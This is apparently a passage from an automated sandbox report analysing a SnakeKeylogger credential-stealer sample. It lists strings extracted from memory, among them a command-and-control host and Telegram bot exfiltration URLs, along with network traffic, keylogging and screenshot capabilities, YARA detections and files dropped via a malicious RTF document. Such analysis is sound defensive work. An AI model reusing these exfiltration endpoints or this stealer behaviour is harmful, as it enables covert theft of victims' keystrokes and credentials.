                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000246D000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: millitingacy20306.exe, 0000000A.00000002.436028498.0000000002200000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20a
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002493000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002493000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                  Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
                  Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                  Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
                  Source: millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003527000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003502000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000034CD000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003581000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000035B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
                  Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                  Source: millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                  Source: millitingacy20306.exe, 0000000D.00000002.951853308.000000000356C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000034DA000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000034B8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000358E000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.00000000035C6000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49184 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture screen (.Net source)
                  Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                  Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Microsoft Office drops suspicious files
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\millizxc.doc.urlJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\txt on 66.63.187.123.urlJump to behavior
                  Office equation editor drops PE file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\millitingacy20306.exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess Stats: CPU usage > 49%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_006699219_2_00669921
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_00664F079_2_00664F07
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_0021919110_2_00219191
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_0021D51010_2_0021D510
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_0021E7D810_2_0021E7D8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_0021D94810_2_0021D948
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_0021ED4010_2_0021ED40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 10_2_0021DE3010_2_0021DE30
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003DE8A813_2_003DE8A8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D40F813_2_003D40F8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D391413_2_003D3914
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D810013_2_003D8100
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D496813_2_003D4968
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D69B813_2_003D69B8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D31B113_2_003D31B1
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003DB1B013_2_003DB1B0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D99D313_2_003D99D3
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D43C813_2_003D43C8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D749013_2_003D7490
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D348113_2_003D3481
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D5D0013_2_003D5D00
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003DDD5013_2_003DDD50
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D3E2813_2_003D3E28
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D469913_2_003D4699
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D8EC213_2_003D8EC2
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D87E013_2_003D87E0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003DF1D913_2_003DF1D9
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003D9A4913_2_003D9A49
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003DE32513_2_003DE325
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003DFB0813_2_003DFB08
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003DE39813_2_003DE398
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003DDD4113_2_003DDD41
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003DED4013_2_003DED40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003DD5B813_2_003DD5B8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003DD5C813_2_003DD5C8
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_003DF67013_2_003DF670
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F004013_2_005F0040
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F324013_2_005F3240
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F644013_2_005F6440
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F1C6013_2_005F1C60
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F4E6013_2_005F4E60
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F806013_2_005F8060
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F2C0013_2_005F2C00
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F5E0013_2_005F5E00
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F900013_2_005F9000
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F162013_2_005F1620
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F482013_2_005F4820
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F7A2013_2_005F7A20
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F0CC013_2_005F0CC0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F3EC013_2_005F3EC0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F70C013_2_005F70C0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F44F013_2_005F44F0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F28E013_2_005F28E0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F5AE013_2_005F5AE0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F8CE013_2_005F8CE0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F869013_2_005F8690
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F068013_2_005F0680
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F388013_2_005F3880
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F6A8013_2_005F6A80
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F22A013_2_005F22A0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F54A013_2_005F54A0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F86A013_2_005F86A0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F194013_2_005F1940
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F4B4013_2_005F4B40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F7D4013_2_005F7D40
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F036013_2_005F0360
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F356013_2_005F3560
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F676013_2_005F6760
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F130013_2_005F1300
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F450013_2_005F4500
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F770013_2_005F7700
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F2F2013_2_005F2F20
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F612013_2_005F6120
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F25C013_2_005F25C0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F57C013_2_005F57C0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F89C013_2_005F89C0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F2BF613_2_005F2BF6
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F0FE013_2_005F0FE0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F41E013_2_005F41E0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F73E013_2_005F73E0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F099013_2_005F0990
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F1F8013_2_005F1F80
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F518013_2_005F5180
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F838013_2_005F8380
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F57B013_2_005F57B0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F89B013_2_005F89B0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F09A013_2_005F09A0
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeCode function: 13_2_005F3BA013_2_005F3BA0
